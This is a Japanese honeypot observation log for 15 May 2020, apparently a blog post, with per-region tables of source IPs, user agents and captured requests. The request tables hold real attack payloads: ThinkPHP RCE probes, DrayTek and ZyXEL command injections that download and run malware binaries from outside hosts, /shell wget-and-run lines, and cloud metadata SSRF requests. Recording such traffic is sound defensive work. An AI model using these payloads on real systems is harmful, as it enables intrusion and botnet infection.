ハニーポット(仮) 観測記録 2020/05/15分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetへのスキャン行為
zgrabへのスキャン行為
Apache Solrへのスキャン行為
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 172.245.52.231/jaws; sh /tmp/
cd /tmp; rm -rf *; wget cnc.9iar.me/jaws; sh /tmp/jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetへのスキャン行為
XTCへのスキャン行為
zgrabへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがAbcdであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:57 (前日比:-6)
US:総アクセス数:132 (前日比:+104)
UK:総アクセス数:53 (前日比:+16)
SG:総アクセス数:51 (前日比:+25)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 42.188.19.107 | Malaysia |
17 | 44.224.22.196 | United States |
17 | 44.225.84.206 | United States |
1 | 49.49.242.97 | Thailand |
1 | 96.84.182.170 | United States |
10 | 106.13.222.241 | China |
1 | 133.232.87.13 | Japan |
1 | 162.243.136.141 | United States |
1 | 162.243.139.160 | United States |
1 | 179.49.60.210 | Ecuador |
4 | 195.54.160.121 | Russia |
2 | 222.186.150.105 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
22 | - |
14 | AWS Security Scanner |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
2 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
10 | \x16\x03\x01 | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 5.101.0.209 | Russia |
1 | 24.41.166.50 | United States |
1 | 61.219.11.153 | Taiwan |
1 | 72.138.37.2 | Canada |
3 | 80.82.78.104 | Netherlands |
1 | 91.203.61.191 | Ukraine |
1 | 98.187.171.82 | United States |
1 | 118.254.228.51 | China |
10 | 121.201.34.11 | China |
1 | 161.35.4.60 | United States |
1 | 162.243.140.138 | United States |
1 | 170.246.149.166 | Costa Rica |
1 | 190.0.57.46 | Colombia |
1 | 190.93.138.68 | Colombia |
5 | 195.54.160.121 | Russia |
100 | 221.120.37.189 | Taiwan |
1 | 223.155.92.236 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
1 | Go-http-client/1.1 |
100 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 zgrab/0.x |
2 | Python-httplib2/0.17.3 (gzip) |
4 | XTC |
1 | XTC BOTNET |
2 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | ../../proc/ HTTP | |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
100 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
2 | POST | /boaform/admin/formPing | HTTP/1.1 |
5 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
2 | POST | /dvr/cmd | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 61.219.11.153 | Taiwan |
1 | 66.240.205.34 | United States |
1 | 79.124.62.46 | Bulgaria |
1 | 79.129.168.203 | Greece |
1 | 80.82.78.104 | Netherlands |
1 | 95.213.177.123 | Russia |
2 | 95.213.177.124 | Russia |
2 | 95.213.177.125 | Russia |
1 | 95.213.177.126 | Russia |
1 | 104.225.251.29 | United States |
10 | 106.52.92.57 | China |
10 | 119.96.133.212 | China |
1 | 125.64.94.211 | China |
1 | 154.126.79.223 | Madagascar |
1 | 162.243.139.50 | United States |
1 | 167.71.116.115 | United States |
1 | 172.104.242.173 | United States |
1 | 174.46.81.211 | United States |
1 | 185.128.41.50 | Switzerland |
1 | 190.167.10.147 | Dominican Republic |
1 | 193.42.99.162 | United States |
12 | 195.54.160.121 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
2 | Go-http-client/1.1 |
1 | Java/1.8.0_131 |
6 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
1 | Mozilla/5.0 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 zgrab/0.x |
1 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - | ||
1 | Gh0st\xad | ||
1 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | GET | ../../proc/ HTTP | |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 172.245.52.231/jaws;sh+/tmp/jaws | |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ cnc.9iar.me/jaws;sh+/tmp/jaws | |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158939709365&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158941343703&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158942961223&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158944598557&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158946232915&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158947827047&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 5.101.0.209 | Russia |
10 | 36.103.229.37 | China |
3 | 59.126.61.145 | Taiwan |
1 | 66.76.250.45 | United States |
1 | 74.105.81.187 | United States |
1 | 77.61.185.101 | Netherlands |
4 | 80.82.77.33 | Netherlands |
6 | 80.82.78.104 | Netherlands |
9 | 100.38.51.212 | United States |
1 | 162.243.137.90 | United States |
1 | 162.243.144.220 | United States |
1 | 172.104.242.173 | United States |
1 | 174.118.46.5 | Canada |
1 | 180.175.193.18 | China |
1 | 184.162.45.52 | Canada |
1 | 185.128.41.50 | Switzerland |
1 | 188.3.58.161 | Turkey |
1 | 190.7.145.82 | Colombia |
1 | 190.94.192.8 | Venezuela |
1 | 190.249.168.25 | Colombia |
1 | 195.54.160.121 | Russia |
1 | 206.225.74.190 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
4 | Abcd |
1 | Go-http-client/1.1 |
1 | Java/1.8.0_131 |
1 | Mozilla/5.0 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
6 | Python-httplib2/0.17.3 (gzip) |
9 | XTC |
1 | polaris botnet |
1 | python-requests/2.23.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | - | ||
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
3 | GET | /operator/basic.shtml?id=1337 | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
2 | GET | /sess-bin/login_session.cgi | HTTP/1.1 |
3 | GET | /setup.cgi | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
9 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /doLogin | HTTP/1.1 |
6 | POST | /dvr/cmd | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |